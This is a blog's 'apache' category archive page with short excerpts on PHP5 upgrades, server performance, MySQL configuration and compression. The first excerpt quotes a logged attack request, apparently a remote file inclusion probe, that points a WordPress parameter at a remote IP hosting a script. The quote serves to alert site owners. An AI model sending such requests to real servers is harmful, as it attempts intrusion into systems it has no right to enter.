If you look through your server logs you’ll probably notice more than a few requests like these:
GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? … “libwww-perl/5.805″
GET…
Archive for the ‘apache’ Category
I upgraded one of my servers to PHP5 this morning. Two things to watch out for:
The location of your…
May 28th, 2007
The real way to improve server performance
25 Comments, Humour, Linux, WordPress, apache, by Donncha.If you want to improve server performance, the best way is to move as much of the processing off it…
January 3rd, 2007
Cannot load mysql extension. Please check your PHP configuration.
37 Comments, Development, Linux, PHP, apache, by Donncha.A friend recently had a problem configuring a new server. He installed PHP, Apache, MySQL and phpMyAdmin but when he…
mod_gzip, zlib.output_compression or whatever way you compress your web pages is a great way of reducing your network traffic costs…
August 15th, 2006
Stopping the spam after moving house
No Comments, Mod Rewrite, apache, by Donncha.A few weeks ago I moved this blog to this new location but left a 301 redirect on all URLs…